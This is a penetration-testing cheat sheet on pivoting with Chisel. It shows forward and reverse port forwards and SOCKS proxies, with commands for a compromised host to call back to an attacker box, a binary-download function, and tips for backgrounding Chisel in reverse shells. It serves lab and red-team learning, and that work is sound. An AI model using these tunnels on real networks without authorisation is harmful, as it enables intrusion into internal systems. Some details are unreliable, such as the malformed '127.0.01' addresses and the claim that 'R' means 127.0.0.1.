Port Forwarding with Chisel
GitHub
Download from the Releases Page
Usage
Requires a copy of the Chisel binary on:
- The target host
- The attacker's host.
Chisel also supports authenticated proxies to prevent unwanted connections.
Chisel Advantages
- Chisel is a portable binary that can be run on the attack box or the target
- Either party can host the chisel server on a chosen TCP port
- Because of this, there is a high amount of flexibility in situations where restrictions on connectivity exist
- No dependencies on SSH daemons on the target
- If the target is not running a SSH server, no problem
Example Data Flow
Chisel Server Running on Attack Box
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | <<=============== | | TARGET BOX |
| | =====[SSH TUNNEL]====| [HTTP WEB SOCKET] |======[SSH TUNNEL]=====>> | |
| CHISEL SERVER | |___________________________________________________| | CHISEL CLIENT |
| | | |
|_____________________| |_____________________|
Chisel Server Running on Target
NOTE: If you plan on running the chisel
server on the target, ensure the traffic is allowed through any firewalls
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | ===============>> | | TARGET BOX |
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | |
| CHISEL CLIENT | |___________________________________________________| | CHISEL SERVER |
| | | |
|_____________________| |_____________________|
Example Commands
Individual Port Forwarding
NOTE: If you plan on running the chisel
server on the target, ensure the traffic is allowed through any firewalls. In general, running the chisel
server on the attack box is a safer bet
Network Diagram
SCENARIO
--------
Services on TARGET BOX is listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | ===============>> | | TARGET BOX |
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | |
| CHISEL CLIENT | | |___________________________________________________| | | CHISEL SERVER |
| | | | | |
|_____________________| | | |_____________________|
| |
127.0.0.1:8001 ------| |-------127.0.0.1:8001
127.0.0.1:8443 ------' '-------127.0.0.1:8443
Chisel Server on Target
# Chisel server is listening on TCP port 51234
# Make sure this port is open in the firewall
/tmp/chisel server --socks5 --port 51234
Chisel Client on Attack Box
# Example shows multiple port forwards
# You can specify one or many port forwards
# Add or remove port forward declarations as needed
/tmp/chisel client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.01:8443
^ ^
| |____attack-ip:attack-port:target-ip:target-port
|
|________attack-ip:attack-port:target-ip:target-port
Reverse Individual Port Forwarding
- A service on a compromised host is listening on
127.0.0.1
- Run the Chisel server on the attack box in reverse mode and connect from the target
- Specify one or many reverse port forwards on the client
- Open a port on attack box and forward traffic to remote port
Network Diagram
SCENARIO
--------
Services on TARGET BOX is listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | <<=============== | | TARGET BOX |
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | |
| CHISEL SERVER | | |___________________________________________________| | | CHISEL CLIENT |
| | | | | |
|_____________________| | | |_____________________|
| |
127.0.0.1:8001 ------| |-------127.0.0.1:8001
127.0.0.1:8443 ------' '-------127.0.0.1:8443
Chisel Server on Attack Box
# Chisel server listening on TCP port 51234
./chisel server --reverse --port 51234
Chisel Client on Target
# Example command shows multiple port forwards
# You can specify one or many port forwards
# Add or remove port forward declarations as needed
/tmp/chisel client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.01:8443
^ ^
| |___ attack-ip:attack-port:target-ip:target-port
|
|___ attack-ip:attack-port:target-ip:target-port
# "R" is shorthand for "127.0.0.1"
# Effectively, listen on 127.0.0.1 on attack box
Forward Dynamic SOCKS Proxy
- Run the Chisel server on the target box
- Use the target box as a jump host to reach additional targets routable by the target
- The traffic flows forward to the target box, which acts as a transparent SOCKS proxy
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________ _______ _______
| | | | | | | |
| | ___________________________________________________ | | | | _______ | |
| ATTACK BOX | | ===============>> | | TARGET BOX | <<===================>> ------- | | -------
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> | |
| CHISEL CLIENT | | |___________________________________________________| | CHISEL SERVER | <<===================>> _______ ------- _______
| | | | | | | | |
|_____________________| | |_____________________| | | | |
| ------- -------
127.0.0.1:50080------' ADDITIONAL TARGETS OR NETWORKS
Chisel Server on Target
# Chisel server is listening on TCP port 51234
# Make sure this port is open in the firewall
/tmp/chisel server --socks5 --port 51234
Chisel Client on Attack Box
# Open a single SOCKS5 proxy port on the attack box
/tmp/chisel client target-box-ip:51234 50080:socks
^
|____attack-port:socks
Reverse Dynamic SOCKS Proxy
- Run the Chisel server on the attack box in reverse mode
- Connect to the Chisel server from the target and specify a reverse port forward
- The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________ _______ _______
| | | | | | | |
| | ___________________________________________________ | | | | _______ | |
| ATTACK BOX | | <<=============== | | TARGET BOX | <<===================>> ------- | | -------
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> | |
| CHISEL SERVER | | |___________________________________________________| | CHISEL CLIENT | <<===================>> _______ ------- _______
| | | | | | | | |
|_____________________| | |_____________________| | | | |
| ------- -------
127.0.0.1:50080------' ADDITIONAL TARGETS OR NETWORKS
Chisel Server on Attack Box
/tmp/chisel server --reverse --port 51234
Chisel Client on Target
# Open a single SOCKS5 proxy port on the attack box
/tmp/chisel client attack-box-ip:51234 R:50080:socks
^
|___ R:attack-port:socks
"R" is shorthand for "127.0.0.1"
Effectively, listen on 127.0.0.1 on attack box
Bash Function to Download Chisel Binaries
I've added this function to my ~/.zshrc
file so that I can just invoke the function at any time to download the Linux and Windows chisel
binaries.
function download_chisel() {
# Variables
download_base_url='https://github.com/jpillora/chisel/releases/download'
tags_base_url='https://github.com/jpillora/chisel/tags'
linux_output_name='chisel.gz'
linux32_output_name='chisel32.gz'
windows_output_name='chisel.exe.gz'
windows32_output_name='chisel32.exe.gz'
url_version=$(curl -s $tags_base_url | grep 'releases/tag/v' | head -n 1 | cut -d '>' -f 3 | cut -d '<' -f 1)
binary_version=$(echo $url_version | tr -d 'v')
linux_binary_name="chisel_${binary_version}_linux_amd64.gz"
linux32_binary_name="chisel_${binary_version}_linux_386.gz"
windows_binary_name="chisel_${binary_version}_windows_amd64.gz"
windows32_binary_name="chisel_${binary_version}_windows_386.gz"
linux_download_url="${download_base_url}/${url_version}/${linux_binary_name}"
linux32_download_url="${download_base_url}/${url_version}/${linux32_binary_name}"
windows_download_url="${download_base_url}/${url_version}/${windows_binary_name}"
windows32_download_url="${download_base_url}/${url_version}/${windows32_binary_name}"
# Download, extract, set mode
curl -sL $linux_download_url -o "$PWD/${linux_output_name}"
curl -sL $linux32_download_url -o "$PWD/${linux32_output_name}"
curl -sL $windows_download_url -o "$PWD/${windows_output_name}"
curl -sL $windows32_download_url -o "$PWD/${windows32_output_name}"
gunzip $linux_output_name > /dev/null
gunzip $linux32_output_name > /dev/null
gunzip $windows_output_name > /dev/null
gunzip $windows32_output_name > /dev/null
chmod u+x ./chisel > /dev/null
echo "Linux and Windows chisel binaries downloaded and unarchived in $PWD"
}
Reverse Shell Tips
Run Chisel in the Background
Running chisel
in the foreground in a reverse shell will render your shell useless, adding these notes here as a way to work around this.
Linux
Client Mode
# Background a process with '&'
# Example commmand
chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 &
Server Mode
# Background a process with '&'
# Example commmand
chisel server --port 8080 --reverse &
Windows
PowerShell
Client Mode
# Use the Start-Job cmdlet with a script block
# Example commmand
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:33060:127.0.0.1:3306','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $scriptBlock
Server Mode
Note that in server
mode, you'll need to make sure your port is allowed through the firewall.
# Use the Start-Job cmdlet with a script block
# Example commmand
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $scriptBlock